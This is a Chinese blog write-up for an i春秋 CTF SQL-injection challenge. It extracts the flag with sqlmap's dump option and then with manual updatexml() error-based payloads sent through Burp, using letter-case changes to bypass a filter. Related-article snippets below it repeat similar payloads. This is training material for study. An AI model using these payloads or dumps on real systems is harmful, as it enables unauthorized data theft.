i春秋CTF-训练营 SQL注入-2 一鱼三吃 sqlmap bp手注 python脚本

最新推荐文章于 2023-04-12 21:38:23 发布
最新推荐文章于 2023-04-12 21:38:23 发布
阅读量474 收藏 1
点赞数 1
分类专栏: CTF -WEB 学习 文章标签: 安全 web安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121638753
版权

目录

题目

 做题前获取的信息

一鱼三吃

sqlmap

burp手注

python自动化脚本

题目

 做题前获取的信息

 F12查看源码得到提示

依照题目信息,post提交数据。

一鱼三吃

sqlmap

随便输入用户名,密码 提交 burp拦截 右键 Copy to file 文件保存为2.txt

 

我用的burp是在windows环境下的,所以把2.txt 复制放在kail桌面。(也可以自己在虚拟机创建一个2.txt文件 ,把bp中的数据粘贴到文件中)

 

 桌面打开终端用sqlmap 一把嗦 (dump 命令把数据全输出 不需要查库查表查字段!麻烦!)

sqlmap -r 2.txt --dump

得到flag

burp手注

输入用户名为aaaa 密码为 1234 (其实可以随便输入)依照提示在url后面加上?tips=1

抓包后,右键点击send to repeater模块

开始测试

使用一些一般的语句,发现只是报错,没有回显有用信息

使用 updatexml 函数使其回显

SQL注入之错误注入_基于updatexml()_wangyuxiang946的博客-CSDN博客

构造payload

name=aaaa'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())),1)#&pass=1234

报错,

怀疑是进行了某些过滤,尝试到大小写可以绕过。

构造payload (这个语句能直接获取表名,不用先判断数据库。)

name=aaaa'+or+updatexml(1,concat(0x7e,(Select+group_concat(column_name)+from+information_schema.columnss+where+table_name='')),1)#&pass=1234

得到表名fl4g

查询字段

name=aaaa'+or+updatexml(1,concat(0x7e,(Select+group_concat(column_name)+from+information_schema.columns+where+table_name='fl4g')),1)#&pass=1234

 

 得到字段名flag

查询fl4g的值

name=aaaa'+or+updatexml(1,concat(0x7e,(Select+flag+from+fl4g)),1)#&pass=1234

 得到flag。

python自动化脚本

.......自己python编写脚本的能力还差了点,这里放出一位博主的文章。

i春秋《从0到1:CTFer成长之路》题目(Web——SQL注入-2)_LSYZWF的博客-CSDN博客

AAAAAAAAAAAA66
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入基础实战(i春秋
Jaychouzzk
08-17 3435
1.Access手工注入  实验环境 操作机:Windows XP 目标机:Windows Server 2003 目标地址:http://172.16.12.2 实验工具 火狐浏览器:火狐浏览器是一款非常流行的Internet浏览器。 实验目的 1、学习Asp手工注入方法 2、学习Asp手工注入原理 实验内容 Access Access是Microsoft Office Acc...
i春秋《从0到1:CTFer成长之路》题目(Web——SQL注入-2)
LSYZWF的博客
05-21 2039
文章目录题目链接:解题思路1、首先点击login.php,输入进行尝试2、开始尝试是否存在注入3、这里可以判断列字段的个数,但是没有回显此步可以省略4、由于没有回显,故只能尝试盲注5、抓包分析6、编写脚本 题目链接: https://www.ichunqiu.com/battalion?t=1&r=68487 解题思路 1、首先点击login.php,输入进行尝试 输入admin显示账户或者密码错误 而输入其他显示账号不存在 这里可以初步猜测用户名就是admin 2、开始尝试是否存在注入 输入a
i春秋SQL注入-1
金 帛的博客
04-04 713
i春秋WP
python sql注入漏洞 ctf_CTFlearn Inj3ction Time --sql注入python多线程脚本练习
weixin_39630048的博客
12-09 175
0x00前言:本题是国外的一个CTF平台的题目,题目不难,但学习了波多线程payload写法先看题目描述,提示"union是个有用的命令",估计是用联合查询就能出答案的(因为前面有道easy题也是联合查询出答案,因此我最先做题没看题干,以为要盲注...于是写了payload)0x01正常解法:正常解法很简单,最先用 1'or'1'='1的时候发现没有反应,用burpsuite的Intruder进行...
春秋云境:CVE-2022-32991(SQL注入
m0_65712192的博客
04-12 1668
该CMS的welcome.php中存在SQL注入攻击。
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入sqlmap的入门操作,...
web-ctf-help:脚本集,以帮助基于Webctfs
02-24
Web-CTF-帮助描述一组简单的脚本(目前主要为抓取器),旨在帮助Web CTF。 查找图像源(和替代项),JavaScript源和注释。用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies...
CTF密码学-Python古典密码加密解密脚本
04-30
CTF(Capture The Flag)是一种网络安全竞赛,其中密码学挑战是常见的环节,要求参赛者解决各种加密和解密问题。在这个压缩包中,我们有四个Python脚本,分别涉及摩斯密码、培根密码、ASCII编码和解码以及凯撒密码。...
SQL注入有关的python脚本编写
JohnnyG2000的博客
01-09 2967
#### 判断是否为整形注入 import requests import re header={ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" "Accept-Encoding": "gzip, deflate, br" "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-U
CTF-web 第二部分 SQL注入(2)
iamsongyu的博客
10-08 646
sql注入 sql大法宝 mid(),substr(),left() mid截断函数–》MID(column_name,start[,length]) 前两个必须 最后可选 substr()函数–》 Substr()和substring()函数实现的功能是一样的,均为截取字符串。 (string, start, length) 从1开始的 Left()函数–》得到字符串左部指定个数的字符 L...
CTF学习笔记——sql注入(2)
Obs_cure的博客
08-16 548
一、[SUCTF 2019]EasySQL 看标题就知道是关于sql注入的题目。老规矩,先跑一下sqlmap,再用1’ or 1=1 #试试。 全部木大了…看writeup吧…
第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋 文件上传】
weixin_44722125的博客
05-14 2714
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or的两边要有单引号,使它变成password=‘xxx’ or 'xxx’的形式,那么可以根据32位16进制的字符串来查找‘or’对应的16进制是276f7227,所以我们的目标就是要找一个字符串取3...
i春秋CTF训练 Web SQL
椰奶冻不安全的博客
06-27 458
Web SQL 题目内容:出题人就告诉你这是个注入,有种别走! 链接需到ichunqiu网站申请 xxx.changame.ichunqiu.com/index.php?id=1 xxx.changame.ichunqiu.com/index.php?id=1=1 xxx.changame.ichunqiu.com/index.php?id=1=2 1=1时正常访问,1=2时页面为空白,为数字型注入 xxx.changame.ichunqiu.com/index.php?id=1 order b
i春秋 “百度杯”CTF比赛 九月场 SQL
include_heqile的博客
09-12 1390
https://www.ichunqiu.com/battalion?t=1&r=0 看题目就知道这是一道注入题,这道题其实并没有什么难度,主要就是select、union、=等被过滤了,我们需要找到一种有效的绕过方法,这道题的绕过方法就是在敏感字符串中间加上<>,这个是通过提交各种特殊字符串并查看源代码得到的,当我们提交了<>之后,再去查看源代码,会发现源代码界...
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 401
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
ctf-使用python进行sql布尔盲注exp的编写
qq_51796436的博客
02-28 1807
文章目录exp编写sql注入布尔盲注 exp编写 poc:验证漏洞是否存在的程序 exp:利用exp能够实现漏洞的利用价值 sql注入 本篇需要了解sql注入的原理再食用
关于用bpsqlmap工具等做出sql注入一种方法
weixin_43326436的博客
06-08 1459
1.工具 sqlmapbp 2.步骤 将bp抓到的包的数据,复制到txt文档中,打开sqlmap。 爆库命令:python2 sqlmap.py -r ***.txt --dbs 依次爆表等 例如: python2 sqlmap.py -r 1.txt --dbs python2 sqlmap.py -r 1.txt -D 爆出的库名 --tables python2 sqlmap.py -r 1.txt -D 爆出的酷库名 -T 爆出的表名 --columns python2 sqlmap.py -r
ctf-qsnctf此地无银
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值